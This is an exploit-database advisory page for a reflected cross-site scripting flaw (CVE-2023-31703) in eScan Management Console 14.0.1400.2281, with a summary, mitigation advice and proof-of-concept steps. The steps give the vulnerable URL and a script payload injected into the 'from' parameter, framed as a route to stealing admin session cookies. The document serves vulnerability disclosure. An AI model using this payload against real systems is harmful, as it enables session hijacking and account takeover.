header-logo
Suggest Exploit
vendor:
eScan Management Console
by:
Sahil Ojha
N/A
CVSS
CRITICAL
Cross Site Scripting
79
CWE
Product Name: eScan Management Console
Affected Version From: 14.0.1400.2281
Affected Version To: 14.0.1400.2281
Patch Exists: NO
Related CWE: CVE-2023-31703
CPE: cl.escanav.com/ewconsole.dll
Metasploit:
Other Scripts:
Platforms Tested: Windows
2023

eScan Management Console 14.0.1400.2281 – Cross Site Scripting

By injecting a malicious payload into the 'from' parameter of a specific URL, an attacker can trigger a cross-site scripting vulnerability in eScan Management Console version 14.0.1400.2281. This allows the attacker to execute arbitrary code in the context of the user's browser, potentially leading to session hijacking and account takeover.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of eScan Management Console that addresses the cross-site scripting issue. Additionally, input validation and output encoding should be implemented to prevent the execution of malicious scripts.
Source

Exploit-DB raw data:

# Exploit Title: eScan Management Console 14.0.1400.2281 - Cross Site Scripting
# Date: 2023-05-16
# Exploit Author: Sahil Ojha
# Vendor Homepage: https://www.escanav.com
# Software Link: https://cl.escanav.com/ewconsole.dll
# Version: 14.0.1400.2281
# Tested on: Windows
# CVE : CVE-2023-31703

*Step of Reproduction/ Proof of Concept(POC)*

1. Login into the eScan Management Console with a valid user credential.
2. Navigate to URL:
https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from=banner&P=
3. Now, Inject the Cross Site Scripting Payload in "from" parameter as
shown below and a valid XSS pop up appeared.
https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from="><script>alert(document.cookie)</script>banner&P=
4. By exploiting this vulnerability, any arbitrary attacker could have
stolen an admin user session cookie to perform account takeover.